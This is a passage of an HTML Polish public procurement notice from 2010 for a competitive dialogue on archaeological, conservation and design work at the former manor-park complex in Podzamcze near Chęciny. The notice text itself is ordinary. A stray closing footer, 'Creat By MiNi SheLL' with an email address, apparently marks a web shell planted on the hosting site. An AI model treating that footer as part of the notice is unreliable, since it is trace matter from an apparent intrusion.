<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane przez Zamawiającego: 6.1. Wniosek o dopuszczenie do udziału dialogu konkurencyjnym,
we wzorze stanowiącym za-łącznik nr 1 6.2. Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika
wprost z dokumentu stwierdzającego status prawny Wykonawcy ( odpis z właściwego rejestru lub zaświadczenia o
wpisie do ewidencji działalności gospodarczej), 6.3. Pełnomocnictwo w przypadku oferty występujących wspólnie o
udzielenie zamówienia. 6.4. Dokumenty sporządzone w języku obcym należy złożyć z tłumaczeniem na język polski
poświadczone przez Wykonawcę. 6.5. W przypadku składania oferty przez wykonawców występujących wspólnie,
zgodnie z art. 23 Pzp, wykonawcy ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy występujący wspólnie (w tym również wspólnicy spółki cywilnej) każdy oddzielnie, nie mogą podlegać
wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp, a także muszą łącznie spełniać wymogi, o których
mowa w art. 22 ust.1 Pzp. Zgodnie z art. 141 Pzp wykonawcy składający ofertę wspólną ponoszą solidarną
odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. Zasady
odpowiedzialności solidarnej dłużników określa art. 366 kodeksu cywilnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 4.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Dokonywanie oceny spełniania warunków udziału w postępowaniu: Zamawiający dokona oceny spełnienia warunków
udziału w postępowaniu na podstawie złożonych wraz z wnioskiem o dopuszczenie do udziału w postępowaniu
wymaganych dokumentów i oświadczeń - w pierwszej kolejności według kryterium /spełnia/ lub /nie spełnia/. Jeżeli
ilość wniosków spełniających minimalne wymagania będzie większa niż 4, Zamawiający dokona oceny według
poniższego kryterium i przyzna punkty według następujących zasad: a)1 punkt - za wymagane co najmniej wykonanie
2 dokumentacji projektowych, o której mowa w opisie warunków udziału oraz dodatkowo po 2 pkt. za każdą
dodatkowo opracowaną dokumentację, ( dotyczy prac, które zostały wykonane należycie); b) 1 punkt - za
wymagane co najmniej 2 wykonane i zakończone prace konserwatorskie i restauracyjne, o której mowa w opisie
warunków udziału oraz dodatkowo po 3 pkt. za każdą dodatkową prace konserwatorską lub restauracyjną
spełniającą wymagania warunków udziału w postępowaniu, ( dotyczy prac, które zostały wykonana należycie), c) 1
punkt - za wymagane co najmniej 2 wykonane i zakończone prace archeologiczne, o której mowa w opisie warunków
udziału oraz dodatkowo po 3 pkt. za każdą dodatkową prace archeologiczną spełniającą wymagania warunków
udziału w postępowaniu ( dotyczy prac, które zostały wykonana należycie). d) 1 punkt - za wykonane co najmniej 3
zadania oraz o których mowa w opisie warunków udziału oraz dodatkowo po 2 pkt za każdą dodatkową pracę
konserwacji rowów, cieków i zbiorników wodnych spełniającą wymagania warunków udziału w postępowaniu (
dotyczy prac, które zostały wykonana należycie) Zamawiający zaprosi do składania ofert wyłącznie tych
Wykonawców, którzy spełniają warunki udziału w postępowaniu oraz zdobędą najwyższą liczbę punktów. W
przypadku, gdy nie będzie można dokonać zakwalifikowania 4 wniosków, z uwagi na to, że 2 lub więcej wniosków
uzyska taką samą liczbę punktów Zamawiający spośród tych wniosków wybierze te, które uzyskały największą
łączną ilość punktów z sumy punktów, o których mowa w powyższych ppkt b i c. Wykonawcę niezaproszonego do
składania ofert, uznaje się za wykluczonego z niniejszego postępowania o udzielenie zamówienia.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania przedmiotu zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Zakres
zagadnień związanych z przedmiotem zamówienia podejmowanych podczas prowadzonego dialogu obejmować
będzie między innymi: konkretyzacje przedmiotu zamówienia pozwalającą na przygotowanie klarownej i
jednoznacznej specyfikacji istotnych warunków zamówienia, obejmujących i rozwijających hasłowego na tą chwilę
zakresu prac jakich wykonanie zamawiający uznaje za niezbędne. Rodzaj prac i usług do wykonania nie zamyka się
obecnie w samym trybie ich realizacji. Sporządzenie specyfikacji dla poszczególnych zakresów możliwe będzie
dopiero po zakończeniu dialogu z wykonawcami. Szczegółowa analiza zadań i harmonogramu, po konsultacjach z
Urzędem Konserwatora Zabytków odpowiedzialnym za wydanie zezwoleń na każdy rodzaj prac, wykazała potrzebę
zaangażowania firmy lub jednostki, której możliwości i doświadczenie zapewnią w trybie poligonowym
przeprowadzenie badań, stworzenie programów i projektów w wybranych zakresach oraz wykonanie prac zgodnie z
zasadami postępowania konserwatorskiego. Zamawiający po zakończeniu dialogu z wykonawcami stanowiącego
drugi etap niniejszego postępowania uważa za konieczną możliwość precyzyjnego wskazania: - zakresu niezbędnych
badań konserwatorskich oraz restauratorskich - zakresu programu prac konserwatorskich oraz restauratorskich -
zakresu badań i prac hydrogeologicznych i prac hydrotechnicznych - zakresu prac pielęgnacyjnych i waloryzacyjnych
istniejącego na terenie drzewostanu a w szczególności Aleii Lipowej. - zakresu badań i prac archeologicznych
Opracowanie wskazanych zakresów pozwoli zarówno na opracowanie szczegółowej inwentaryzacji zabytkowego
założenia dworsko - parkowego, przez określenie stanu jego zachowania aż po wypracowanie optymalnych
sposobów i technik przeprowadzenia prac w tym robót budowlanych na terenie w/w założenia. Ponadto
Zamawiający po zakończeniu dialogu widzi konieczność możliwości określenia sposobu finansowania poszczególnych
części realizacji inwestycji..</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje przyznawania wykonawcom nagród określonych w art. 60c ust. 1 pkt 2 ustawy Prawo
Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 10:00, miejsce: Regionalne Centrum Naukowo - Technologiczne ul. Niska 2H/2 25-317 Kielce sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 4.16.1) Projekt współfinansowany z EFRR w ramach Regionalnego Programu Operacyjnego
Województw Świętokrzyskiego na lata 2007-2013. 4.16.2) Informacje dotyczące składania wniosku o dopuszczenie
do udziały w dialogu konkurencyjnym: 1) Wykonawca lub Wykonawcy występujący wspólnie mogą złożyć jeden
wniosek o dopuszczenie do udziału w postępowaniu. 2) Wniosek sporządza się w języku polskim w sposób trwały w
formie pisemnej. 3) Do wniosku należy załączyć dokumenty wymienione w sekcji III.3 niniejszego ogłoszenia. 4)
Strony wniosku i załączonych dokumentów powinny być ze sobą trwale spięte w sposób uniemożliwiający
dekompletację i kolejno ponumerowane. 5) Wniosek należy złożyć w trwale zamkniętym opakowaniu,
uniemożliwiającym zapoznanie się z jego zawartością do czasu otwarcia wniosków, w miejscu wskazanym w sekcji
IV pkt. 4.4).Na opakowaniu należy umieścić informacje: nazwę i dane teleadresowe Wykonawcy oraz opatrzyć
napisem: Wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego prowadzonego w
trybie dialogu konkurencyjnego na Wykonanie prac na potrzeby projektu Tworzenie kompleksowych terenów
inwestycyjnych w Podzamczu koło Chęcin oraz innych niezbędnych prac projektowych, archeologicznych,
konserwatorskich i restauratorskich na terenie dawnego zespołu dworsko - parkowego w Podzamczu koło Chęcin.
6)Zamawiający niezwłocznie zwraca wniosek, który został złożony po terminie - bez otwierania. 7)Wniosek oraz
załączone oświadczenia, wykazy - powinny być złożone w oryginale i podpisane przez osobę (lub osoby, jeżeli do
reprezentowania Wykonawcy upoważnione są dwie lub więcej osoby) upoważnioną/e do reprezentowania
Wykonawcy/ców (podpis i pieczątka imienna lub podpis czytelny). Wszelkie poprawki i zmiany we wniosku winny być
parafowane przez osobę (osoby) podpisującą (podpisujące) Wniosek. 8) Kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną. 9) Pełnomocnictwo należy
złożyć w formie oryginału lub kopii poświadczonej notarialnie. 10)W przypadku, gdy informacje zawarte we wniosku
stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu
nieuczciwej konkurencji (Dz. U. z 2003 r. Nr 153, poz. 1503 z późn. zm.), Wykonawca winien w sposób nie budzący
wątpliwości zastrzec, które spośród przedstawionych informacji stanowią tajemnicę przedsiębiorstwa. 11)
Zamawiający udostępni formularze: - Wniosku o dopuszczenie do udziału w postępowaniu - (zał. nr 1 do ogłoszenia),
- Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu art. 22 ust. 1 Pzp. - (zał. nr 2), -
Informacji dotyczącej przeciętnej liczby zatrudnionych pracowników- (zał. nr 3), - Wykaz osób przewidzianych do
wykonania zamówienia, którymi wykonawca dysponuje - (zał. nr 4) - Wykaz osób przewidzianych do wykonania
zamówienia, którymi wykonawca będzie dysponować dysponuje - (zał. nr 4a) - Wykaz zrealizowanych dokumentacji
projektowych - (zał. nr 5), - Wykaz zrealizowanych zadań w zakresie prac konserwatorskich i restauratorskich - (
zał. nr 6), - Wykaz zrealizowanych zadań w zakresie prac archeologicznych - (zał. nr 7) - Wykaz zrealizowanych
zadań w zakresie prac konserwacji i modernizacji rowów, cieków i zbiorników wodnych - (zał. nr 8) na własnej
stronie internetowej bip gdzie zamieszczone będzie również niniejsze ogłoszenie o zamówieniu wraz z załącznikiem
graficznym do ww ogłoszenia o którym mowa w pkt 2.1.3. określenie przedmiotu oraz wielkości lub zakresu
zamówienia. 12)Zamawiający dopuszcza złożenie wniosku i załączników do wniosku na formularzach sporządzonych
przez Wykonawcę, pod warunkiem, że ich treść, a także opis kolumn i wierszy odpowiadać będzie formularzom
określonym przez Zamawiającego. 13)Wzór umowy o dofinansowanie projektu znajduje się na stronie Regionalnej
Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Świętokrzyskiego na lata 2007-2013:
www.rpo-swietokrzyskie.pl . 14)Wykonawca, którego oferta zostanie wybrana za najkorzystniejszą będzie między
innymi zobowiązany do podpisania umowy przedstawić polisę ubezpieczeniową od odpowiedzialności cywilnej
deliktowej i kontraktowej na kwotę równą wartości kontraktu za świadczone usługi. 15) W prowadzonym
postępowaniu wszelkie oświadczenia, wnioski zawiadomienia oraz informacje przekazywane będą przez strony
pisemnie lub za pomocą faksu ( tel. faks 41 307 44 76), z wyłączeniem przypadku wykonania przez wykonawcę ( na
wezwanie przekazane faksem przez Zamawiającego) dyspozycji art. 26 ust. 3 Pzp, która następuje tylko w formie
pisemnej. 16) Ewentualnych wyjaśnień, w imieniu Zamawiającego udzielać będzie: - w kwestiach technicznych Pan
Łukasz Czerwik, tel 041 343 40 50 - w kwestiach formalno-prawnych Pan Jarosław Tosnowiec tel 041 343 40 50..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com